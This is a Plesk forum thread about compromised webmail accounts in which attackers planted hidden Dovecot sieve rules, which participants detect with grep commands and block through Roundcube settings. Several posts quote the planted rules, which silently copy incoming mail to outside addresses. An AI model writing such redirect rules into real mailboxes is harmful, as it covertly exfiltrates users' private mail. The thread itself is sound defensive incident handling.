• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • We are looking for U.S.-based freelancer or agency working with SEO or WordPress for a quick 30-min interviews to gather feedback on XOVI, a successful German SEO tool we’re looking to launch in the U.S.
    If you qualify and participate, you’ll receive a $30 Amazon gift card as a thank-you. Please apply here. Thanks for helping shape a better SEO product for agencies!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Issue dovecot / roundcube sieve hack

tkalfaoglu

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails - and not only the redirects that have been placed using the PLESK interface..
 
prornec.com domain was hosted in servers in Romania, with IP ranges of:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
tkalfaoglu said:
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Click to expand...
Have a look a the config file from Roundcubes managesieve plugin. There are some options that might prevent creating similar rules trough Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] seem useful options to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks.. the forward option does not contain a disable option..

Code: 
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had same issue, highly recommend every one to check their sieve(.dovecot.sieve, roundcube.sieve, ingo.sieve) files, you can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Notice, some of these filters can be user set, check them with users.


Sample of our findings:


#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
 
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
ChristophRo said:
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
Click to expand...
As an additional note, this only works for RC version 1.5 and up. Which is currently is not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log to the plesk db:
Code: 
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

On the select output check the email column, it usually is an email not hosted on the server.
 
JVG said:
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log to the plesk db:
Code: 
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

On the select output check the email column, it usually is an email not hosted on the server.
Click to expand...
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
github.com

roundcubemail/config/defaults.inc.php at master · roundcube/roundcubemail

The Roundcube Webmail suite. Contribute to roundcube/roundcubemail development by creating an account on GitHub.
github.com github.com
 
  • Like
Reactions: JVG
Kaspar said:
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
github.com

roundcubemail/config/defaults.inc.php at master · roundcube/roundcubemail

The Roundcube Webmail suite. Contribute to roundcube/roundcubemail development by creating an account on GitHub.
github.com github.com
Click to expand...
Didn't know this option, perfect!

Also, I would recommend turning on the userlogins option: $config['log_logins'] = true;
 
You must log in or register to reply here.

Similar threads

W
Issue Mail forwarded on the server in the target mailbox is delivered to the SPAM folder
Replies
0
Views
464
W4ru
W
M
Issue Qmail / Dovecot - mail forwarding fails endlessly
Replies
5
Views
3K
mw004
M
T
Resolved dovecot webmail filters missing after upgrade 17.5 to 17.8#4
Replies
1
Views
2K
TomBoB
T
G J Piper
Resolved Global Dovecot Sieve Rule?
Replies
17
Views
16K
giannisantoua
G
N
Issue [PPP-27056] Sendmail problems w/ sieve
Replies
12
Views
4K
IgorG
IgorG
Back
Top